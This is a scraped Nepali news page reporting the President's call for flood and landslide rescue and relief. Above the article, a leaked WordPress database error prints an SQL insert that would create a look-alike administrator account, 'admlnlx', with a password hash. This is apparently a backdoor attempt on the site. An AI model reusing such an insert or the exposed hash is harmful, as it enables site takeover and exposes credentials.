WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.WU/NnCJX4Nte/jkQLQcZQUA07QPg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:06:04', '', 'admlnlx', 'admlnlx')

उद्धार र राहतमा जुट्न राष्ट्रपतिको आह्वान – Gaule Khabar

उद्धार र राहतमा जुट्न राष्ट्रपतिको आह्वान

उद्धार र राहतमा जुट्न राष्ट्रपतिको आह्वान

गाउँले न्युज, २९ असार, काठमाडौं । राष्ट्रपति विद्यादेवी भण्डारीले बाढी, पहिरो र डुवान पीडितहरुको उद्दार तथा राहतमा जुट्न सबैलाई आह्वान गरेकी छन् ।

राष्ट्रपति भण्डारीले अविरल वर्षाका कारण देशका विभिन्न ठाउमा आएको बाढी, पहिरो र डुवानबाट भएको धनजनको क्षतिप्रति दुःख व्यक्त गरेकी छन् ।
राष्ट्रपति भण्डारीले उद्दार तथा राहतमा जुट्न र प्राकृतिक प्रकोपबाट बच्न आवश्यक सावधानी अपनाउन सबैलाई आह्वान गरेकी छन् ।

साभार: अनलाईनखबर

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका